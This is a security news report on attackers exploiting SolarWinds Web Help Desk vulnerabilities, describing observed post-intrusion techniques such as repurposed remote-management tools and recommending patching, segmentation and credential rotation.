Malicious actors are actively targeting vulnerabilities in the SolarWinds Web Help Desk (WHD) platform, emphasizing the critical need for solid application security and network segmentation. WHD, widely used for IT support and asset management, has recently been the subject of multiple security alerts regarding flaws that allow unauthorized access.
The US Cybersecurity and Infrastructure Security Agency (CISA) recently added CVE-2025-40551, a critical deserialization flaw, to its Known Exploited Vulnerabilities (KEV) Catalog. This vulnerability was disclosed alongside several others in late January. While the specific entry vector for recent intrusions varies, the presence of these vulnerabilities in internet-facing applications presents a significant risk to organizations.
Analysis of Observed Intrusion Techniques
Microsoft has reported observing multistage intrusions targeting WHD instances. Due to overlapping vulnerability windows, it remains technically difficult to confirm whether the initial access point was the recently disclosed CVE-2025-40551 or older flaws such as CVE-2025-26399. The latter is a remote code execution flaw disclosed in September 2025, which served as a bypass for previous patches. Microsoft noted that because intrusions occurred on systems susceptible to multiple CVEs simultaneously, the exact initial foothold could not be definitively isolated.
Regardless of the specific vulnerability leveraged, the post-intrusion methodology follows a consistent pattern. Threat actors are employing "living-off-the-land" (LotL) techniques—using pre-existing system tools to conduct operations—alongside legitimate administrative software to maintain persistence and move laterally.
Research indicates that once unauthorized access is gained, the compromised WHD service may initiate PowerShell processes to utilize the Background Intelligent Transfer Service (BITS) for downloading additional tools. Microsoft’s analysis highlights that a single exposed application can serve as a gateway to broader domain compromise if not adequately monitored or patched.
Tool Repurposing and Persistence
Further analysis by Huntress corroborates these findings. In observed incidents, unauthorized parties deployed legitimate software to establish command and control (C2) channels. Specifically, the following tools have been identified in these campaigns:
Zoho ManageEngine and Zoho Meetings: Used for lateral movement and persistence.
Cloudflare Tunnels: Deployed rapidly after initial access to maintain connectivity.
Velociraptor: A digital forensics and incident response (DFIR) tool repurposed for C2.
The use of Velociraptor is notable. While typically a defensive tool, it was previously observed in October 2025 being utilized by the threat group Storm-2603 for ransomware operations. Huntress analysts note that internet exposure of WHD administrative interfaces significantly lowers the barrier for entry, allowing actors to discover targets at scale without requiring a prior foothold.
According to data from the Shadowserver Foundation, scans for CVE-2025-40551 have identified approximately 170 WHD instances that remain vulnerable and exposed to the public internet.
Mitigation and Defensive Strategies
Securing SolarWinds WHD instances requires a combination of immediate patching and structural network changes.
Network Segmentation and Access Control The most effective preventative measure is to remove direct internet access to WHD administrative interfaces. Placing these instances behind firewalls or requiring VPN access reduces the surface area available for broad-scope targeting.
Patch Management Organizations should verify their WHD installation is updated to version 2026.1 or later. This release addresses the identified critical vulnerabilities.
Credential Rotation and Auditing Given the potential for credential theft during these intrusions, security teams should rotate credentials for WHD service accounts, administrator accounts, and any other identities accessible through the platform.
Environment Review Security teams should conduct a thorough review of hosts running WHD for unauthorized remote access software. Specifically, the presence of Zoho Assist, Velociraptor, or unexpected Cloudflare tunnel configurations should be investigated immediately. Microsoft also advises removing unapproved remote monitoring and management (RMM) tools from the network to prevent their misuse.